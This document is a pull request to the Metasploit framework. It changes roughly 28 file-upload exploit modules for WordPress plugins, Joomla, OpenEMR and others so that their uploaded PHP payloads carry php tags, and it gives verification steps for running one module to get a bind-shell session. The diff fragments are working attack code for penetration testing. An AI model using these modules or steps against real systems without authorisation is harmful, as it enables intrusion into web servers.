### PR TITLE
Force php tags for upload exploit modules (bug #7001)

### DIFF
--- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb
+++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_name = rand_text_alpha(rand(10) + 5)
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")
+    post_data.add_part(get_write_exec_payload, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")
     file = post_data.to_s
     file.strip!
 

--- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
+++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -88,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
       'headers'  => { 'Content-Type' => 'text/plain' },
       'vars_get' => { 'name' => payload_name },
-      'data'  => payload.encoded
+      'data'  => get_write_exec_payload
     })
 
     # If the server returns 200 we assume we uploaded the malicious

--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
+    data.add_part(get_write_exec_payload, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
     post_data = data.to_s
 
     res = send_request_cgi({

--- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb
+++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -65,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def generate_mime_message(payload, name)
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"")
+    data.add_part(get_write_exec_payload, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"")
     data
   end
 

--- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
+++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -143,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     post_data = Rex::MIME::Message.new
     post_data.add_part("", nil, nil, "form-data; name=\"bn_save\"")
-    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"form_image\"; filename=\"#{payload_name}\"")
+    post_data.add_part(get_write_exec_payload, "application/octet-stream", nil, "form-data; name=\"form_image\"; filename=\"#{payload_name}\"")
     file = post_data.to_s
     file.strip!
 

--- a/modules/exploits/unix/webapp/openemr_upload_exec.rb
+++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info={})
     super(update_info(info,
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     peer = "#{rhost}:#{rport}"
     payload_name = rand_text_alpha(rand(10) + 5) + '.php'
-    my_payload = payload.encoded
+    my_payload = get_write_exec_payload
 
     print_status("Sending PHP payload (#{payload_name})")
     res = send_request_raw({

--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
-    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", get_write_exec_payload)
     zip
   end
 

--- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
       'vars_post'   => {
         'action'    => 'alm_save_repeater',
-        'value'     => payload.encoded,
+        'value'     => get_write_exec_payload,
         'repeater'  => 'default',
         'type'      => 'default',
         'alias'     => '',

--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     print_status("Uploading payload #{payload_name}")

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 
     res = send_request_cgi({

--- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
+++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       filename = "#{rand_text_alpha(10)}.php"
 
       data = Rex::MIME::Message.new
-      data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
+      data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
 
       print_status("Uploading payload")
       res = send_request_cgi(

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -97,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_mime_message(payload, date_hash, name, include_req_id)
     data = Rex::MIME::Message.new
     data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
-    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
+    data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
     data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
     data
   end

--- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers'  => {
         'X-File-Name' => "#{filename}"
       },
-      'data' => payload.encoded
+      'data' => get_write_exec_payload
     )
 
     if res

--- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -70,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # versions, we will send the same path in the request.
     upload_path = Rex::Text.encode_base64('../uploads')
 
-    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
+    data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
     data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
     data
   end

--- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -49,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php_page_name = rand_text_alpha(8 + rand(8)) + '.php'
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"")
     post_data = data.to_s
 
     res = send_request_cgi(

--- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb
+++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' =>
       {
         'fileNamePattern' => php_pagename,
-        'fileTemplate'    => payload.encoded
+        'fileTemplate'    => get_write_exec_payload
       }
     })
 

--- a/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -94,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data = Rex::MIME::Message.new
     data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
     data.add_part(nonce, nil, nil, 'form-data; name="security"')
-    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
+    data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
     data
   end
 

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('upload', nil, nil, 'form-data; name="action"')
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
     data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
     post_data = data.to_s
 

--- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -66,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_mime_message(payload, name)
     data = Rex::MIME::Message.new
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    zip.add_file("#{name}.php", payload.encoded)
+    zip.add_file("#{name}.php", get_write_exec_payload)
     data.add_part(zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"files\"; filename=\"#{name}.zip\"")
     data
   end

--- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   Rank = ExcellentRanking
 
@@ -55,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
       print_status("URI requested: #{request.raw_uri}")
-      send_response(cli, payload.encoded)
+      send_response(cli, get_write_exec_payload)
   end
 
   # Create a custom URI

--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -47,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 
     time = Time.new

--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -54,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_zip = Rex::Zip::Archive.new
     # If the filename in the zip is revslider.php it will be automatically
     # executed but it will break the plugin and sometimes WordPress
-    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)
+    payload_zip.add_file('revslider/' + php_pagename, get_write_exec_payload)
 
     # Build the POST body
     data = Rex::MIME::Message.new

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -82,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"')
     data.add_part("", nil, nil, 'form-data; name="Slide[order]"')
     data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"')
-    data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"")
+    data.add_part(get_write_exec_payload, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"")
     post_data = data.to_s
 
     print_status("Uploading payload")

--- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -52,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
     data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
     data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
-    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
+    data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
     data
   end
 

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -48,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('upload', nil, nil, 'form-data; name="action"')
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 
     res = send_request_cgi({

--- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -49,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
+    data.add_part(get_write_exec_payload, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
     post_data = data.to_s
 
     res = send_request_cgi(

--- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -92,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = "#{rand_text_alpha(10)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"myfile\"; filename=\"#{filename}\"")
+    data.add_part(get_write_exec_payload, 'application/x-php', nil, "form-data; name=\"myfile\"; filename=\"#{filename}\"")
     data.add_part('homescreen_image', nil, nil, 'form-data; name="file_type"')
     data.add_part('upload_file', nil, nil, 'form-data; name="action"')
     data.add_part('wptouch__foundation__logo_image', nil, nil, 'form-data; name="setting_name"')

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
   def initialize(info = {})
     super(update_info(
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     content = {
       ::File.join(theme_name, 'style.css') => '',
-      ::File.join(theme_name, payload_name) => payload.encoded
+      ::File.join(theme_name, payload_name) => get_write_exec_payload
     }
 
     zip_file = Rex::Zip::Archive.new


### PR DESCRIPTION
This is a proposal of fixing for bug #7001 : 
- It lets the php tags in meterpreter (which are ignored if there is already a tag : /_<?php /_*/ )
- It updates many upload exploits to use the function get_write_exec_payload instead of payload.encoded. This function adds the php tags.
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/wp_wysija_newsletters_upload`
- [ ] `set payload php/bind_php`
- [ ] set options
- [ ] `exploit`
- [ ] **Verify** that the file is correctly uploaded executed and you should get a session (on a vulnerable website of course)
